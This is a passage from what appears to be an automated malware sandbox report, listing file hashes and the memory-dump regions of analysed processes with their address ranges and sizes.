                                                                                                                                                                                                                                                                                                  9d5a934d1291db04f88482e2c3e5f3053552e044

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  61727c9ed9fc3b1f5c4a093ec2c117267b98123939766648c4eda1ea2a83aa3f

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  8129c626287277957d07714000f854c20271b4c7a1990431aa41a86b9152000e50b8ffd3cddf8ceb6c78f7ab2b17135fbee115d259964970f854ea6416f0f622

                                                                                                                                                                                                                                                                                                • memory/508-272-0x00007FFAAFDA0000-0x00007FFAB0861000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  10.8MB

                                                                                                                                                                                                                                                                                                • memory/508-241-0x0000000000E00000-0x0000000000E2C000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  176KB

                                                                                                                                                                                                                                                                                                • memory/536-236-0x0000000000AE0000-0x0000000000D03000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  2.1MB

                                                                                                                                                                                                                                                                                                • memory/536-258-0x00000000759E0000-0x0000000075F93000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  5.7MB

                                                                                                                                                                                                                                                                                                • memory/536-252-0x0000000071840000-0x0000000071FF0000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  7.7MB

                                                                                                                                                                                                                                                                                                • memory/536-256-0x0000000073930000-0x00000000739B9000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  548KB

                                                                                                                                                                                                                                                                                                • memory/536-269-0x0000000002790000-0x00000000027D6000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  280KB

                                                                                                                                                                                                                                                                                                • memory/536-237-0x0000000000D10000-0x0000000000D11000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/536-250-0x0000000000AE0000-0x0000000000D03000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  2.1MB

                                                                                                                                                                                                                                                                                                • memory/536-253-0x0000000000AE0000-0x0000000000D03000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  2.1MB

                                                                                                                                                                                                                                                                                                • memory/536-265-0x00000000747E0000-0x000000007482C000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  304KB

                                                                                                                                                                                                                                                                                                • memory/536-245-0x0000000076090000-0x00000000762A5000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  2.1MB

                                                                                                                                                                                                                                                                                                • memory/540-154-0x0000000002C29000-0x0000000002C3A000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  68KB

                                                                                                                                                                                                                                                                                                • memory/540-249-0x0000000003279000-0x00000000032E5000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  432KB

                                                                                                                                                                                                                                                                                                • memory/540-170-0x0000000000400000-0x0000000002B4E000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  39.3MB

                                                                                                                                                                                                                                                                                                • memory/540-169-0x0000000002B80000-0x0000000002B89000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  36KB

                                                                                                                                                                                                                                                                                                • memory/540-262-0x0000000000400000-0x0000000002EEE000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  42.9MB

                                                                                                                                                                                                                                                                                                • memory/540-168-0x0000000002C29000-0x0000000002C3A000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  68KB

                                                                                                                                                                                                                                                                                                • memory/1020-234-0x00000000004E0000-0x0000000000500000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  128KB

                                                                                                                                                                                                                                                                                                • memory/1020-268-0x0000000071840000-0x0000000071FF0000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  7.7MB

                                                                                                                                                                                                                                                                                                • memory/1352-254-0x00000000020D0000-0x0000000002130000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  384KB

                                                                                                                                                                                                                                                                                                • memory/1560-248-0x0000000000090000-0x00000000002B1000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  2.1MB

                                                                                                                                                                                                                                                                                                • memory/1560-251-0x0000000073930000-0x00000000739B9000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  548KB

                                                                                                                                                                                                                                                                                                • memory/1560-246-0x0000000000090000-0x00000000002B1000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  2.1MB

                                                                                                                                                                                                                                                                                                • memory/1560-257-0x00000000759E0000-0x0000000075F93000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  5.7MB

                                                                                                                                                                                                                                                                                                • memory/1560-261-0x00000000747E0000-0x000000007482C000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  304KB

                                                                                                                                                                                                                                                                                                • memory/1560-240-0x0000000076090000-0x00000000762A5000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  2.1MB

                                                                                                                                                                                                                                                                                                • memory/1560-233-0x00000000012C0000-0x00000000012C1000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/1560-267-0x0000000000090000-0x00000000002B1000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  2.1MB

                                                                                                                                                                                                                                                                                                • memory/1560-264-0x0000000002D30000-0x0000000002D76000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  280KB

                                                                                                                                                                                                                                                                                                • memory/1560-228-0x0000000000090000-0x00000000002B1000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  2.1MB

                                                                                                                                                                                                                                                                                                • memory/1636-263-0x00007FFA80030000-0x00007FFA80031000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/1636-259-0x00007FF664EE0000-0x00007FF66548E000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  5.7MB

                                                                                                                                                                                                                                                                                                • memory/1636-260-0x00007FF664EE0000-0x00007FF66548E000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  5.7MB

                                                                                                                                                                                                                                                                                                • memory/2020-266-0x00000000008B0000-0x0000000000910000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  384KB

                                                                                                                                                                                                                                                                                                • memory/2124-242-0x0000000002150000-0x00000000021B0000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  384KB

                                                                                                                                                                                                                                                                                                • memory/2156-194-0x0000000002E00000-0x000000000323D000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4.2MB

                                                                                                                                                                                                                                                                                                • memory/2156-195-0x0000000000400000-0x0000000002584000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  33.5MB

                                                                                                                                                                                                                                                                                                • memory/2448-193-0x0000000000B60000-0x0000000000B75000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  84KB

                                                                                                                                                                                                                                                                                                • memory/2664-174-0x0000000007930000-0x0000000007A3A000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  1.0MB

                                                                                                                                                                                                                                                                                                • memory/2664-190-0x0000000007370000-0x0000000007371000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/2664-175-0x00000000072E0000-0x000000000731C000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  240KB

                                                                                                                                                                                                                                                                                                • memory/2664-173-0x00000000072C0000-0x00000000072D2000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  72KB

                                                                                                                                                                                                                                                                                                • memory/2664-172-0x0000000007F50000-0x0000000008568000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  6.1MB

                                                                                                                                                                                                                                                                                                • memory/2664-171-0x0000000007380000-0x0000000007924000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  5.6MB

                                                                                                                                                                                                                                                                                                • memory/2664-150-0x0000000002BC9000-0x0000000002BEC000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  140KB

                                                                                                                                                                                                                                                                                                • memory/2664-192-0x0000000007373000-0x0000000007374000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/2664-191-0x0000000007372000-0x0000000007373000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/2664-185-0x0000000004790000-0x00000000047C0000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  192KB

                                                                                                                                                                                                                                                                                                • memory/2664-189-0x0000000007374000-0x0000000007376000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                                                                • memory/2664-188-0x0000000000400000-0x0000000002B61000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  39.4MB

                                                                                                                                                                                                                                                                                                • memory/2664-184-0x0000000002BC9000-0x0000000002BEC000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  140KB

                                                                                                                                                                                                                                                                                                • memory/2664-182-0x0000000071840000-0x0000000071FF0000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  7.7MB

                                                                                                                                                                                                                                                                                                • memory/2668-181-0x000000000286A000-0x0000000002CA7000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4.2MB

                                                                                                                                                                                                                                                                                                • memory/2668-183-0x0000000000400000-0x0000000002584000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  33.5MB

                                                                                                                                                                                                                                                                                                • memory/3036-179-0x0000000000400000-0x0000000002584000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  33.5MB

                                                                                                                                                                                                                                                                                                • memory/3036-178-0x0000000002D70000-0x0000000003697000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  9.2MB

                                                                                                                                                                                                                                                                                                • memory/3036-177-0x0000000002928000-0x0000000002D65000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4.2MB

                                                                                                                                                                                                                                                                                                • memory/3276-180-0x0000000000400000-0x0000000000667000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  2.4MB

                                                                                                                                                                                                                                                                                                • memory/3276-166-0x0000000004750000-0x0000000004758000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  32KB

                                                                                                                                                                                                                                                                                                • memory/3352-247-0x0000000000400000-0x0000000000492000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  584KB

                                                                                                                                                                                                                                                                                                • memory/3352-244-0x0000000000700000-0x0000000000727000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  156KB

                                                                                                                                                                                                                                                                                                • memory/3364-139-0x0000000000AF0000-0x0000000000B12000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  136KB

                                                                                                                                                                                                                                                                                                • memory/3364-153-0x00007FFAB0E60000-0x00007FFAB1921000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  10.8MB

                                                                                                                                                                                                                                                                                                • memory/3624-219-0x0000000000E00000-0x0000000000E52000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  328KB

                                                                                                                                                                                                                                                                                                • memory/3624-243-0x0000000005620000-0x000000000563E000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  120KB

                                                                                                                                                                                                                                                                                                • memory/3624-232-0x00000000056A0000-0x0000000005716000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  472KB

                                                                                                                                                                                                                                                                                                • memory/3624-239-0x0000000071840000-0x0000000071FF0000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  7.7MB

                                                                                                                                                                                                                                                                                                • memory/3676-198-0x00000000036D0000-0x000000000388E000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  1.7MB

                                                                                                                                                                                                                                                                                                • memory/4184-255-0x0000000000EE0000-0x0000000000EF8000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  96KB

                                                                                                                                                                                                                                                                                                • memory/4568-278-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  128KB

                                                                                                                                                                                                                                                                                                • memory/4588-281-0x0000000004752000-0x0000000004753000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/4588-274-0x0000000004620000-0x0000000004656000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  216KB

                                                                                                                                                                                                                                                                                                • memory/4588-276-0x0000000071840000-0x0000000071FF0000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  7.7MB

                                                                                                                                                                                                                                                                                                • memory/4588-284-0x0000000004750000-0x0000000004751000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/4648-283-0x0000000006E00000-0x0000000007428000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  6.2MB

                                                                                                                                                                                                                                                                                                • memory/4648-286-0x0000000071840000-0x0000000071FF0000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  7.7MB

                                                                                                                                                                                                                                                                                                • memory/4648-287-0x00000000043C0000-0x00000000043C1000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/4732-285-0x0000000004532000-0x0000000004533000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/4732-280-0x0000000071840000-0x0000000071FF0000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  7.7MB

                                                                                                                                                                                                                                                                                                • memory/4732-282-0x0000000004530000-0x0000000004531000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                • memory/4988-294-0x0000000010000000-0x0000000010D56000-memory.dmp
                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                  13.3MB